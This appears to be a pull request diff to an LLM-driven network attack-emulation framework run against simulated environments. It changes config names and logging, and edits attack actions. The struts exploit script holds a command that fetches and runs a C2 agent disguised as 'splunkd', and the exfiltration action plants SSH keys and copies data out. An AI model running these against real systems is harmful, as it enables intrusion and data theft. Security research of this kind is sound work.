### PR TITLE
Misc fixes: struts exploit, experiment output dir, snake_case env names

### DIFF
--- a/config/attacker_config.py
+++ b/config/attacker_config.py
@@ -6,13 +6,13 @@ from dataclasses import field
 
 # Enum of environments
 class Environment(Enum):
-    EQUIFAX_SMALL = "EquifaxSmall"
-    EQUIFAX_MEDIUM = "EquifaxMedium"
-    EQUIFAX_LARGE = "EquifaxLarge"
-    ICS = "ICSEnvironment"
-    RING = "RingEnvironment"
-    ENTERPRISE_A = "EnterpriseA"
-    ENTERPRISE_B = "EnterpriseB"
+    EQUIFAX_SMALL = "equifax_small"
+    EQUIFAX_MEDIUM = "equifax_medium"
+    EQUIFAX_LARGE = "equifax_large"
+    ICS = "ics"
+    RING = "ring"
+    ENTERPRISE_A = "enterprise_a"
+    ENTERPRISE_B = "enterprise_b"
 
 
 class AbstractionLevel(str, Enum):

--- a/config/config_example.json
+++ b/config/config_example.json
@@ -5,7 +5,7 @@
         "execution_llm": "claude-3.5-haiku",
         "abstraction": "incalmo"
     },
-    "environment": "EquifaxLarge",
+    "environment": "equifax_large",
     "c2c_server": "http://host.docker.internal:8888",
     "blacklist_ips": ["192.168.199.10", "192.168.200.10"]
 }

--- a/config/config_example_state_machine.json
+++ b/config/config_example_state_machine.json
@@ -3,6 +3,6 @@
     "strategy": {
         "name": "EquifaxStrategy"
     },
-    "environment": "EquifaxLarge",
+    "environment": "equifax_large",
     "c2c_server": "http://host.docker.internal:8888"
 }

--- a/incalmo/c2server/payloads/strutsExploit.py
+++ b/incalmo/c2server/payloads/strutsExploit.py
@@ -47,7 +47,7 @@ if __name__ == "__main__":
     ip = sys.argv[1]
     server = sys.argv[2]
 
-    url = f"http://{ip}"
+    url = f"http://{ip}/showcase.action"
     cmd = f"cd ~; curl -s -X POST -H \\'file:sandcat.go\\' -H \\'platform:linux\\' {server}/agent/download > splunkd; chmod +x splunkd; ./splunkd -server {server} -group red &"
 
     print(exploit(url, cmd))

--- a/incalmo/core/actions/HighLevel/exfiltrate_data.py
+++ b/incalmo/core/actions/HighLevel/exfiltrate_data.py
@@ -94,17 +94,20 @@ class ExfiltrateData(HighLevelAction):
         low_level_action_orchestrator: LowLevelActionOrchestrator,
         context: HighLevelContext,
     ):
-        # Get SSH key of attacker agent
-        events = await low_level_action_orchestrator.run_action(
-            ReadFile(attacker_agent, "/root/.ssh/id_rsa.pub"), context
-        )
+        # Get SSH key of attacker agent — try rsa then ed25519
         ssh_key_data = None
-        for event in events:
-            if isinstance(event, FileContentsFound):
-                ssh_key_data = event.contents
+        for key_path in ["/root/.ssh/id_rsa.pub", "/root/.ssh/id_ed25519.pub"]:
+            events = await low_level_action_orchestrator.run_action(
+                ReadFile(attacker_agent, key_path), context
+            )
+            for event in events:
+                if isinstance(event, FileContentsFound) and event.contents:
+                    ssh_key_data = event.contents
+                    break
+            if ssh_key_data:
                 break
 
-        if ssh_key_data is None:
+        if not ssh_key_data:
             raise Exception("No attacker ssh key")
 
         for user, file_paths in self.target_host.critical_data_files.items():

--- a/incalmo/core/actions/HighLevel/exfiltrate_data.py
+++ b/incalmo/core/actions/HighLevel/exfiltrate_data.py
@@ -8,9 +8,10 @@ from incalmo.core.actions.LowLevel import (
     AddSSHKey,
     SCPFile,
     wgetFile,
+    ListFilesInDirectory,
 )
 from incalmo.core.models.network import Host
-from incalmo.core.models.events import Event, FileContentsFound
+from incalmo.core.models.events import Event, FileContentsFound, FilesFound
 from incalmo.core.services import (
     LowLevelActionOrchestrator,
     EnvironmentStateService,
@@ -60,7 +61,7 @@ class ExfiltrateData(HighLevelAction):
 
         if webserver_exists:
             # Exfiltrate data over http
-            await self.indirect_http_exfiltrate(
+            success = await self.indirect_http_exfiltrate(
                 attacker_agent,
                 self.target_host,
                 low_level_action_orchestrator,
@@ -68,6 +69,10 @@ class ExfiltrateData(HighLevelAction):
                 attack_graph_service,
                 context,
             )
+            if not success:
+                await self.direct_ssh_exfiltrate(
+                    attacker_agent, low_level_action_orchestrator, context
+                )
         else:
             await self.direct_ssh_exfiltrate(
                 attacker_agent, low_level_action_orchestrator, context
@@ -88,27 +93,47 @@ class ExfiltrateData(HighLevelAction):
         )
         return events
 
+    async def _get_ssh_public_key(
+        self,
+        agent: Agent,
+        low_level_action_orchestrator: LowLevelActionOrchestrator,
+        context: HighLevelContext,
+    ) -> str | None:
+        # Discover whatever .pub key exists rather than guessing the type
+        list_events = await low_level_action_orchestrator.run_action(
+            ListFilesInDirectory(agent, "~/.ssh"), context
+        )
+        pub_files = []
+        for event in list_events:
+            if isinstance(event, FilesFound):
+                pub_files = [f for f in event.files if f.endswith(".pub")]
+                break
+
+        for filename in pub_files:
+            events = await low_level_action_orchestrator.run_action(
+                ReadFile(agent, f"~/.ssh/{filename}"), context
+            )
+            for event in events:
+                if (
+                    isinstance(event, FileContentsFound)
+                    and event.contents
+                    and event.contents.startswith("ssh-")
+                ):
+                    return event.contents
+        return None
+
     async def direct_ssh_exfiltrate(
         self,
         attacker_agent: Agent,
         low_level_action_orchestrator: LowLevelActionOrchestrator,
         context: HighLevelContext,
     ):
-        # Get SSH key of attacker agent — try rsa then ed25519
-        ssh_key_data = None
-        for key_path in ["/root/.ssh/id_rsa.pub", "/root/.ssh/id_ed25519.pub"]:
-            events = await low_level_action_orchestrator.run_action(
-                ReadFile(attacker_agent, key_path), context
-            )
-            for event in events:
-                if isinstance(event, FileContentsFound) and event.contents:
-                    ssh_key_data = event.contents
-                    break
-            if ssh_key_data:
-                break
+        ssh_key_data = await self._get_ssh_public_key(
+            attacker_agent, low_level_action_orchestrator, context
+        )
 
         if not ssh_key_data:
-            raise Exception("No attacker ssh key")
+            return
 
         for user, file_paths in self.target_host.critical_data_files.items():
             target_agent = self.target_host.get_agent_by_username(user)
@@ -154,7 +179,7 @@ class ExfiltrateData(HighLevelAction):
         env_state_service: EnvironmentStateService,
         attack_graph_service: AttackGraphService,
         context: HighLevelContext,
-    ):
+    ) -> bool:
         hosts_with_creds = attack_graph_service.find_hosts_with_credentials_to_host(
             target_host
         )
@@ -174,9 +199,11 @@ class ExfiltrateData(HighLevelAction):
         if webserver_host is None:
             raise Exception("No webservers to exfiltrate to")
 
-        await self.add_ssh_key(
+        key_added = await self.add_ssh_key(
             webserver_host, target_host, low_level_action_orchestrator, context
         )
+        if not key_added:
+            return False
 
         for user, critical_filepaths in self.target_host.critical_data_files.items():
             for critical_filepath in critical_filepaths:
@@ -210,8 +237,7 @@ class ExfiltrateData(HighLevelAction):
         webserver_port = webserver_host.get_port_for_service("http")
 
         if ssh_host_ip is None or webserver_port is None:
-            # Error, unable to exfitlrate data
-            return []
+            return False
 
         for user, critical_filepaths in self.target_host.critical_data_files.items():
             for critical_filepath in critical_filepaths:
@@ -223,6 +249,7 @@ class ExfiltrateData(HighLevelAction):
                     ),
                     context,
                 )
+        return True
 
     async def add_ssh_key(
         self,
@@ -230,23 +257,19 @@ class ExfiltrateData(HighLevelAction):
         target_host: Host,
         low_level_action_orchestrator: LowLevelActionOrchestrator,
         context: HighLevelContext,
-    ):
+    ) -> bool:
+        key_added = False
         for src_agent in source_host.agents:
-            # Get SSH key of attacker agent
-            events = await low_level_action_orchestrator.run_action(
-                ReadFile(src_agent, "~/.ssh/id_rsa.pub"), context
+            ssh_key_data = await self._get_ssh_public_key(
+                src_agent, low_level_action_orchestrator, context
             )
-            ssh_key_data = None
-            for event in events:
-                if isinstance(event, FileContentsFound):
-                    ssh_key_data = event.contents
-                    break
 
             if ssh_key_data is None:
                 continue
 
             for target_agent in target_host.agents:
-                # Add SSH key to target host
                 await low_level_action_orchestrator.run_action(
                     AddSSHKey(target_agent, ssh_key_data), context
                 )
+            key_added = True
+        return key_added

--- a/incalmo/core/actions/LowLevel/nikto_scan.py
+++ b/incalmo/core/actions/LowLevel/nikto_scan.py
@@ -17,7 +17,7 @@ class NiktoScan(LowLevelAction):
         self.port = port
         self.service = service
 
-        command = f"nikto -h {host} -p {port} -maxtime 10s -timeout 3"
+        command = f"nikto -h {host} -p {port} -Tuning 8 -maxtime 60s -timeout 3"
         super().__init__(agent, command)
 
     async def get_result(
@@ -27,7 +27,7 @@ class NiktoScan(LowLevelAction):
         if result.output is None:
             return []
 
-        if "CVE-2017-5638" in result.output:
+        if "CVE-2017-5638" in result.output or "strutshock" in result.output:
             return [
                 VulnerableServiceFound(
                     port=self.port,

--- a/incalmo/core/services/logging_service.py
+++ b/incalmo/core/services/logging_service.py
@@ -9,13 +9,15 @@ import json
 
 class IncalmoLogger:
     def __init__(self, operation_id: str):
-        self.logger_dir_path = f"output/{operation_id}"
+        output_dir_override = os.environ.get("INCALMO_OUTPUT_DIR")
+        if output_dir_override:
+            self.logger_dir_path = output_dir_override
+        else:
+            self.logger_dir_path = f"output/{operation_id}"
+            if not os.path.exists("output"):
+                os.mkdir("output")
 
-        if not os.path.exists("output"):
-            os.mkdir("output")
-
-        if not os.path.exists(f"output/{operation_id}"):
-            os.mkdir(f"output/{operation_id}")
+        os.makedirs(self.logger_dir_path, exist_ok=True)
 
         self._configure_file_only_logging()
 

--- a/incalmo/frontend/incalmo-ui/src/hooks/interfaceIncalmoApi.ts
+++ b/incalmo/frontend/incalmo-ui/src/hooks/interfaceIncalmoApi.ts
@@ -169,7 +169,7 @@ export const useIncalmoApi = () => {
           abstraction: "incalmo"
         },
         execution_llm: "claude-3.5-haiku",
-        environment: "EquifaxLarge",
+        environment: "equifax_large",
         c2c_server: "http://host.docker.internal:8888",
         blacklist_ips: ["192.168.199.10", "192.168.200.10"]
       };
@@ -248,7 +248,7 @@ export const useIncalmoApi = () => {
           abstraction: "incalmo"
         },
         execution_llm: "claude-3.5-haiku",
-        environment: "EquifaxLarge",
+        environment: "equifax_large",
         c2c_server: "http://host.docker.internal:8888",
         blacklist_ips: ["192.168.199.10", "192.168.200.10"]
       };

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -27,7 +27,7 @@ dependencies = [
     "langchain-google-genai>=2.0.10",
     "langchain-deepseek>=0.1.3",
     "pytest>=8.4.2",
-    "pymetasploit3>=1.0.6",
+    "kombu[sqlalchemy]>=5.5.4",
 ]
 
 [dependency-groups]

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,3 +1,7 @@
+[build-system]
+requires = ["hatchling"]
+build-backend = "hatchling.build"
+
 [project]
 name = "incalmo"
 version = "0.1.0"

--- a/uv.lock
+++ b/uv.lock
@@ -234,15 +234,6 @@ wheels = [
 ]
 
 [[package]]
-name = "decorator"
-version = "5.2.1"
-source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/43/fa/6d96a0978d19e17b68d634497769987b16c8f4cd0a7a05048bec693caa6b/decorator-5.2.1.tar.gz", hash = "sha256:65f266143752f734b0a7cc83c46f4618af75b8c5911b00ccb61d0ac9b6da0360", size = 56711, upload-time = "2025-02-24T04:41:34.073Z" }
-wheels = [
-    { url = "https://files.pythonhosted.org/packages/4e/8c/f3147f5c4b73e7550fe5f9352eaa956ae838d5c51eb58e7a25b9f3e2643b/decorator-5.2.1-py3-none-any.whl", hash = "sha256:d316bb415a2d9e2d2b3abcc4084c6502fc09240e292cd76a76afc106a1c8e04a", size = 9190, upload-time = "2025-02-24T04:41:32.565Z" },
-]
-
-[[package]]
 name = "distro"
 version = "1.9.0"
 source = { registry = "https://pypi.org/simple" }
@@ -526,6 +517,7 @@ dependencies = [
     { name = "debugpy" },
     { name = "flask", extra = ["async"] },
     { name = "flask-cors" },
+    { name = "kombu", extra = ["sqlalchemy"] },
     { name = "langchain" },
     { name = "langchain-anthropic" },
     { name = "langchain-deepseek" },
@@ -535,7 +527,6 @@ dependencies = [
     { name = "psutil" },
     { name = "pydantic" },
     { name = "pydantic-settings" },
-    { name = "pymetasploit3" },
     { name = "pytest" },
     { name = "redis" },
     { name = "requests" },
@@ -554,6 +545,7 @@ requires-dist = [
     { name = "debugpy", specifier = ">=1.8.14" },
     { name = "flask", extras = ["async"], specifier = ">=3.1.0" },
     { name = "flask-cors", specifier = ">=6.0.0" },
+    { name = "kombu", extras = ["sqlalchemy"], specifier = ">=5.5.4" },
     { name = "langchain", specifier = ">=0.3.25" },
     { name = "langchain-anthropic", specifier = ">=0.3.15" },
     { name = "langchain-deepseek", specifier = ">=0.1.3" },
@@ -563,7 +555,6 @@ requires-dist = [
     { name = "psutil", specifier = ">=7.0.0" },
     { name = "pydantic", specifier = ">=2.11.4" },
     { name = "pydantic-settings", specifier = ">=2.9.1" },
-    { name = "pymetasploit3", specifier = ">=1.0.6" },
     { name = "pytest", specifier = ">=8.4.2" },
     { name = "redis", specifier = ">=6.2.0" },
     { name = "requests", specifier = ">=2.32.3" },
@@ -673,6 +664,11 @@ dependencies = [
 sdist = { url = "https://files.pythonhosted.org/packages/0f/d3/5ff936d8319ac86b9c409f1501b07c426e6ad41966fedace9ef1b966e23f/kombu-5.5.4.tar.gz", hash = "sha256:886600168275ebeada93b888e831352fe578168342f0d1d5833d88ba0d847363", size = 461992, upload-time = "2025-06-01T10:19:22.281Z" }
 wheels = [
     { url = "https://files.pythonhosted.org/packages/ef/70/a07dcf4f62598c8ad579df241af55ced65bed76e42e45d3c368a6d82dbc1/kombu-5.5.4-py3-none-any.whl", hash = "sha256:a12ed0557c238897d8e518f1d1fdf84bd1516c5e305af2dacd85c2015115feb8", size = 210034, upload-time = "2025-06-01T10:19:20.436Z" },
+]
+
+[package.optional-dependencies]
+sqlalchemy = [
+    { name = "sqlalchemy" },
 ]
 
 [[package]]
@@ -835,41 +831,6 @@ wheels = [
 ]
 
 [[package]]
-name = "msgpack"
-version = "1.1.2"
-source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/4d/f2/bfb55a6236ed8725a96b0aa3acbd0ec17588e6a2c3b62a93eb513ed8783f/msgpack-1.1.2.tar.gz", hash = "sha256:3b60763c1373dd60f398488069bcdc703cd08a711477b5d480eecc9f9626f47e", size = 173581, upload-time = "2025-10-08T09:15:56.596Z" }
-wheels = [
-    { url = "https://files.pythonhosted.org/packages/6b/31/b46518ecc604d7edf3a4f94cb3bf021fc62aa301f0cb849936968164ef23/msgpack-1.1.2-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:4efd7b5979ccb539c221a4c4e16aac1a533efc97f3b759bb5a5ac9f6d10383bf", size = 81212, upload-time = "2025-10-08T09:15:14.552Z" },
-    { url = "https://files.pythonhosted.org/packages/92/dc/c385f38f2c2433333345a82926c6bfa5ecfff3ef787201614317b58dd8be/msgpack-1.1.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:42eefe2c3e2af97ed470eec850facbe1b5ad1d6eacdbadc42ec98e7dcf68b4b7", size = 84315, upload-time = "2025-10-08T09:15:15.543Z" },
-    { url = "https://files.pythonhosted.org/packages/d3/68/93180dce57f684a61a88a45ed13047558ded2be46f03acb8dec6d7c513af/msgpack-1.1.2-cp313-cp313-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:1fdf7d83102bf09e7ce3357de96c59b627395352a4024f6e2458501f158bf999", size = 412721, upload-time = "2025-10-08T09:15:16.567Z" },
-    { url = "https://files.pythonhosted.org/packages/5d/ba/459f18c16f2b3fc1a1ca871f72f07d70c07bf768ad0a507a698b8052ac58/msgpack-1.1.2-cp313-cp313-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:fac4be746328f90caa3cd4bc67e6fe36ca2bf61d5c6eb6d895b6527e3f05071e", size = 424657, upload-time = "2025-10-08T09:15:17.825Z" },
-    { url = "https://files.pythonhosted.org/packages/38/f8/4398c46863b093252fe67368b44edc6c13b17f4e6b0e4929dbf0bdb13f23/msgpack-1.1.2-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:fffee09044073e69f2bad787071aeec727183e7580443dfeb8556cbf1978d162", size = 402668, upload-time = "2025-10-08T09:15:19.003Z" },
-    { url = "https://files.pythonhosted.org/packages/28/ce/698c1eff75626e4124b4d78e21cca0b4cc90043afb80a507626ea354ab52/msgpack-1.1.2-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:5928604de9b032bc17f5099496417f113c45bc6bc21b5c6920caf34b3c428794", size = 419040, upload-time = "2025-10-08T09:15:20.183Z" },
-    { url = "https://files.pythonhosted.org/packages/67/32/f3cd1667028424fa7001d82e10ee35386eea1408b93d399b09fb0aa7875f/msgpack-1.1.2-cp313-cp313-win32.whl", hash = "sha256:a7787d353595c7c7e145e2331abf8b7ff1e6673a6b974ded96e6d4ec09f00c8c", size = 65037, upload-time = "2025-10-08T09:15:21.416Z" },
-    { url = "https://files.pythonhosted.org/packages/74/07/1ed8277f8653c40ebc65985180b007879f6a836c525b3885dcc6448ae6cb/msgpack-1.1.2-cp313-cp313-win_amd64.whl", hash = "sha256:a465f0dceb8e13a487e54c07d04ae3ba131c7c5b95e2612596eafde1dccf64a9", size = 72631, upload-time = "2025-10-08T09:15:22.431Z" },
-    { url = "https://files.pythonhosted.org/packages/e5/db/0314e4e2db56ebcf450f277904ffd84a7988b9e5da8d0d61ab2d057df2b6/msgpack-1.1.2-cp313-cp313-win_arm64.whl", hash = "sha256:e69b39f8c0aa5ec24b57737ebee40be647035158f14ed4b40e6f150077e21a84", size = 64118, upload-time = "2025-10-08T09:15:23.402Z" },
-    { url = "https://files.pythonhosted.org/packages/22/71/201105712d0a2ff07b7873ed3c220292fb2ea5120603c00c4b634bcdafb3/msgpack-1.1.2-cp314-cp314-macosx_10_13_x86_64.whl", hash = "sha256:e23ce8d5f7aa6ea6d2a2b326b4ba46c985dbb204523759984430db7114f8aa00", size = 81127, upload-time = "2025-10-08T09:15:24.408Z" },
-    { url = "https://files.pythonhosted.org/packages/1b/9f/38ff9e57a2eade7bf9dfee5eae17f39fc0e998658050279cbb14d97d36d9/msgpack-1.1.2-cp314-cp314-macosx_11_0_arm64.whl", hash = "sha256:6c15b7d74c939ebe620dd8e559384be806204d73b4f9356320632d783d1f7939", size = 84981, upload-time = "2025-10-08T09:15:25.812Z" },
-    { url = "https://files.pythonhosted.org/packages/8e/a9/3536e385167b88c2cc8f4424c49e28d49a6fc35206d4a8060f136e71f94c/msgpack-1.1.2-cp314-cp314-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:99e2cb7b9031568a2a5c73aa077180f93dd2e95b4f8d3b8e14a73ae94a9e667e", size = 411885, upload-time = "2025-10-08T09:15:27.22Z" },
-    { url = "https://files.pythonhosted.org/packages/2f/40/dc34d1a8d5f1e51fc64640b62b191684da52ca469da9cd74e84936ffa4a6/msgpack-1.1.2-cp314-cp314-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:180759d89a057eab503cf62eeec0aa61c4ea1200dee709f3a8e9397dbb3b6931", size = 419658, upload-time = "2025-10-08T09:15:28.4Z" },
-    { url = "https://files.pythonhosted.org/packages/3b/ef/2b92e286366500a09a67e03496ee8b8ba00562797a52f3c117aa2b29514b/msgpack-1.1.2-cp314-cp314-musllinux_1_2_aarch64.whl", hash = "sha256:04fb995247a6e83830b62f0b07bf36540c213f6eac8e851166d8d86d83cbd014", size = 403290, upload-time = "2025-10-08T09:15:29.764Z" },
-    { url = "https://files.pythonhosted.org/packages/78/90/e0ea7990abea5764e4655b8177aa7c63cdfa89945b6e7641055800f6c16b/msgpack-1.1.2-cp314-cp314-musllinux_1_2_x86_64.whl", hash = "sha256:8e22ab046fa7ede9e36eeb4cfad44d46450f37bb05d5ec482b02868f451c95e2", size = 415234, upload-time = "2025-10-08T09:15:31.022Z" },
-    { url = "https://files.pythonhosted.org/packages/72/4e/9390aed5db983a2310818cd7d3ec0aecad45e1f7007e0cda79c79507bb0d/msgpack-1.1.2-cp314-cp314-win32.whl", hash = "sha256:80a0ff7d4abf5fecb995fcf235d4064b9a9a8a40a3ab80999e6ac1e30b702717", size = 66391, upload-time = "2025-10-08T09:15:32.265Z" },
-    { url = "https://files.pythonhosted.org/packages/6e/f1/abd09c2ae91228c5f3998dbd7f41353def9eac64253de3c8105efa2082f7/msgpack-1.1.2-cp314-cp314-win_amd64.whl", hash = "sha256:9ade919fac6a3e7260b7f64cea89df6bec59104987cbea34d34a2fa15d74310b", size = 73787, upload-time = "2025-10-08T09:15:33.219Z" },
-    { url = "https://files.pythonhosted.org/packages/6a/b0/9d9f667ab48b16ad4115c1935d94023b82b3198064cb84a123e97f7466c1/msgpack-1.1.2-cp314-cp314-win_arm64.whl", hash = "sha256:59415c6076b1e30e563eb732e23b994a61c159cec44deaf584e5cc1dd662f2af", size = 66453, upload-time = "2025-10-08T09:15:34.225Z" },
-    { url = "https://files.pythonhosted.org/packages/16/67/93f80545eb1792b61a217fa7f06d5e5cb9e0055bed867f43e2b8e012e137/msgpack-1.1.2-cp314-cp314t-macosx_10_13_x86_64.whl", hash = "sha256:897c478140877e5307760b0ea66e0932738879e7aa68144d9b78ea4c8302a84a", size = 85264, upload-time = "2025-10-08T09:15:35.61Z" },
-    { url = "https://files.pythonhosted.org/packages/87/1c/33c8a24959cf193966ef11a6f6a2995a65eb066bd681fd085afd519a57ce/msgpack-1.1.2-cp314-cp314t-macosx_11_0_arm64.whl", hash = "sha256:a668204fa43e6d02f89dbe79a30b0d67238d9ec4c5bd8a940fc3a004a47b721b", size = 89076, upload-time = "2025-10-08T09:15:36.619Z" },
-    { url = "https://files.pythonhosted.org/packages/fc/6b/62e85ff7193663fbea5c0254ef32f0c77134b4059f8da89b958beb7696f3/msgpack-1.1.2-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:5559d03930d3aa0f3aacb4c42c776af1a2ace2611871c84a75afe436695e6245", size = 435242, upload-time = "2025-10-08T09:15:37.647Z" },
-    { url = "https://files.pythonhosted.org/packages/c1/47/5c74ecb4cc277cf09f64e913947871682ffa82b3b93c8dad68083112f412/msgpack-1.1.2-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:70c5a7a9fea7f036b716191c29047374c10721c389c21e9ffafad04df8c52c90", size = 432509, upload-time = "2025-10-08T09:15:38.794Z" },
-    { url = "https://files.pythonhosted.org/packages/24/a4/e98ccdb56dc4e98c929a3f150de1799831c0a800583cde9fa022fa90602d/msgpack-1.1.2-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:f2cb069d8b981abc72b41aea1c580ce92d57c673ec61af4c500153a626cb9e20", size = 415957, upload-time = "2025-10-08T09:15:40.238Z" },
-    { url = "https://files.pythonhosted.org/packages/da/28/6951f7fb67bc0a4e184a6b38ab71a92d9ba58080b27a77d3e2fb0be5998f/msgpack-1.1.2-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:d62ce1f483f355f61adb5433ebfd8868c5f078d1a52d042b0a998682b4fa8c27", size = 422910, upload-time = "2025-10-08T09:15:41.505Z" },
-    { url = "https://files.pythonhosted.org/packages/f0/03/42106dcded51f0a0b5284d3ce30a671e7bd3f7318d122b2ead66ad289fed/msgpack-1.1.2-cp314-cp314t-win32.whl", hash = "sha256:1d1418482b1ee984625d88aa9585db570180c286d942da463533b238b98b812b", size = 75197, upload-time = "2025-10-08T09:15:42.954Z" },
-    { url = "https://files.pythonhosted.org/packages/15/86/d0071e94987f8db59d4eeb386ddc64d0bb9b10820a8d82bcd3e53eeb2da6/msgpack-1.1.2-cp314-cp314t-win_amd64.whl", hash = "sha256:5a46bf7e831d09470ad92dff02b8b1ac92175ca36b087f904a0519857c6be3ff", size = 85772, upload-time = "2025-10-08T09:15:43.954Z" },
-    { url = "https://files.pythonhosted.org/packages/81/f2/08ace4142eb281c12701fc3b93a10795e4d4dc7f753911d836675050f886/msgpack-1.1.2-cp314-cp314t-win_arm64.whl", hash = "sha256:d99ef64f349d5ec3293688e91486c5fdb925ed03807f64d98d205d2713c60b46", size = 70868, upload-time = "2025-10-08T09:15:44.959Z" },
-]
-
-[[package]]
 name = "openai"
 version = "1.88.0"
 source = { registry = "https://pypi.org/simple" }
@@ -983,15 +944,6 @@ wheels = [
 ]
 
 [[package]]
-name = "py"
-version = "1.11.0"
-source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/98/ff/fec109ceb715d2a6b4c4a85a61af3b40c723a961e8828319fbcb15b868dc/py-1.11.0.tar.gz", hash = "sha256:51c75c4126074b472f746a24399ad32f6053d1b34b68d2fa41e558e6f4a98719", size = 207796, upload-time = "2021-11-04T17:17:01.377Z" }
-wheels = [
-    { url = "https://files.pythonhosted.org/packages/f6/f0/10642828a8dfb741e5f3fbaac830550a518a775c7fff6f04a007259b0548/py-1.11.0-py2.py3-none-any.whl", hash = "sha256:607c53218732647dff4acdfcd50cb62615cedf612e72d1724fb1a0cc6405b378", size = 98708, upload-time = "2021-11-04T17:17:00.152Z" },
-]
-
-[[package]]
 name = "pyasn1"
 version = "0.6.1"
 source = { registry = "https://pypi.org/simple" }
@@ -1086,17 +1038,6 @@ sdist = { url = "https://files.pythonhosted.org/packages/b0/77/a5b8c569bf593b014
 wheels = [
     { url = "https://files.pythonhosted.org/packages/c7/21/705964c7812476f378728bdf590ca4b771ec72385c533964653c68e86bdc/pygments-2.19.2-py3-none-any.whl", hash = "sha256:86540386c03d588bb81d44bc3928634ff26449851e99741617ecb9037ee5ec0b", size = 1225217, upload-time = "2025-06-21T13:39:07.939Z" },
 ]
-
-[[package]]
-name = "pymetasploit3"
-version = "1.0.6"
-source = { registry = "https://pypi.org/simple" }
-dependencies = [
-    { name = "msgpack" },
-    { name = "requests" },
-    { name = "retry" },
-]
-sdist = { url = "https://files.pythonhosted.org/packages/55/f8/608109a595e52c09db0454417a29101b4c1f0d5c0f941b1270a545f7ab3a/pymetasploit3-1.0.6.tar.gz", hash = "sha256:cb8601428eaf6befcd12e13e0967ae7a8d1a1081c49c465806bd561fdd2a1f14", size = 24723, upload-time = "2024-04-05T20:27:42.732Z" }
 
 [[package]]
 name = "pyparsing"
@@ -1218,19 +1159,6 @@ dependencies = [
 sdist = { url = "https://files.pythonhosted.org/packages/f3/61/d7545dafb7ac2230c70d38d31cbfe4cc64f7144dc41f6e4e4b78ecd9f5bb/requests-toolbelt-1.0.0.tar.gz", hash = "sha256:7681a0a3d047012b5bdc0ee37d7f8f07ebe76ab08caeccfc3921ce23c88d5bc6", size = 206888, upload-time = "2023-05-01T04:11:33.229Z" }
 wheels = [
     { url = "https://files.pythonhosted.org/packages/3f/51/d4db610ef29373b879047326cbf6fa98b6c1969d6f6dc423279de2b1be2c/requests_toolbelt-1.0.0-py2.py3-none-any.whl", hash = "sha256:cccfdd665f0a24fcf4726e690f65639d272bb0637b9b92dfd91a5568ccf6bd06", size = 54481, upload-time = "2023-05-01T04:11:28.427Z" },
-]
-
-[[package]]
-name = "retry"
-version = "0.9.2"
-source = { registry = "https://pypi.org/simple" }
-dependencies = [
-    { name = "decorator" },
-    { name = "py" },
-]
-sdist = { url = "https://files.pythonhosted.org/packages/9d/72/75d0b85443fbc8d9f38d08d2b1b67cc184ce35280e4a3813cda2f445f3a4/retry-0.9.2.tar.gz", hash = "sha256:f8bfa8b99b69c4506d6f5bd3b0aabf77f98cdb17f3c9fc3f5ca820033336fba4", size = 6448, upload-time = "2016-05-11T13:58:51.541Z" }
-wheels = [
-    { url = "https://files.pythonhosted.org/packages/4b/0d/53aea75710af4528a25ed6837d71d117602b01946b307a3912cb3cfcbcba/retry-0.9.2-py2.py3-none-any.whl", hash = "sha256:ccddf89761fa2c726ab29391837d4327f819ea14d244c232a1d24c67a2f98606", size = 7986, upload-time = "2016-05-11T13:58:39.925Z" },
 ]
 
 [[package]]

--- a/uv.lock
+++ b/uv.lock
@@ -413,7 +413,6 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/b1/cf/f5c0b23309070ae93de75c90d29300751a5aacefc0a3ed1b1d8edb28f08b/greenlet-3.2.3-cp313-cp313-macosx_11_0_universal2.whl", hash = "sha256:500b8689aa9dd1ab26872a34084503aeddefcb438e2e7317b89b11eaea1901ad", size = 270732, upload-time = "2025-06-05T16:10:08.26Z" },
     { url = "https://files.pythonhosted.org/packages/48/ae/91a957ba60482d3fecf9be49bc3948f341d706b52ddb9d83a70d42abd498/greenlet-3.2.3-cp313-cp313-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:a07d3472c2a93117af3b0136f246b2833fdc0b542d4a9799ae5f41c28323faef", size = 639033, upload-time = "2025-06-05T16:38:53.983Z" },
     { url = "https://files.pythonhosted.org/packages/6f/df/20ffa66dd5a7a7beffa6451bdb7400d66251374ab40b99981478c69a67a8/greenlet-3.2.3-cp313-cp313-manylinux2014_ppc64le.manylinux_2_17_ppc64le.whl", hash = "sha256:8704b3768d2f51150626962f4b9a9e4a17d2e37c8a8d9867bbd9fa4eb938d3b3", size = 652999, upload-time = "2025-06-05T16:41:37.89Z" },
-    { url = "https://files.pythonhosted.org/packages/51/b4/ebb2c8cb41e521f1d72bf0465f2f9a2fd803f674a88db228887e6847077e/greenlet-3.2.3-cp313-cp313-manylinux2014_s390x.manylinux_2_17_s390x.whl", hash = "sha256:5035d77a27b7c62db6cf41cf786cfe2242644a7a337a0e155c80960598baab95", size = 647368, upload-time = "2025-06-05T16:48:21.467Z" },
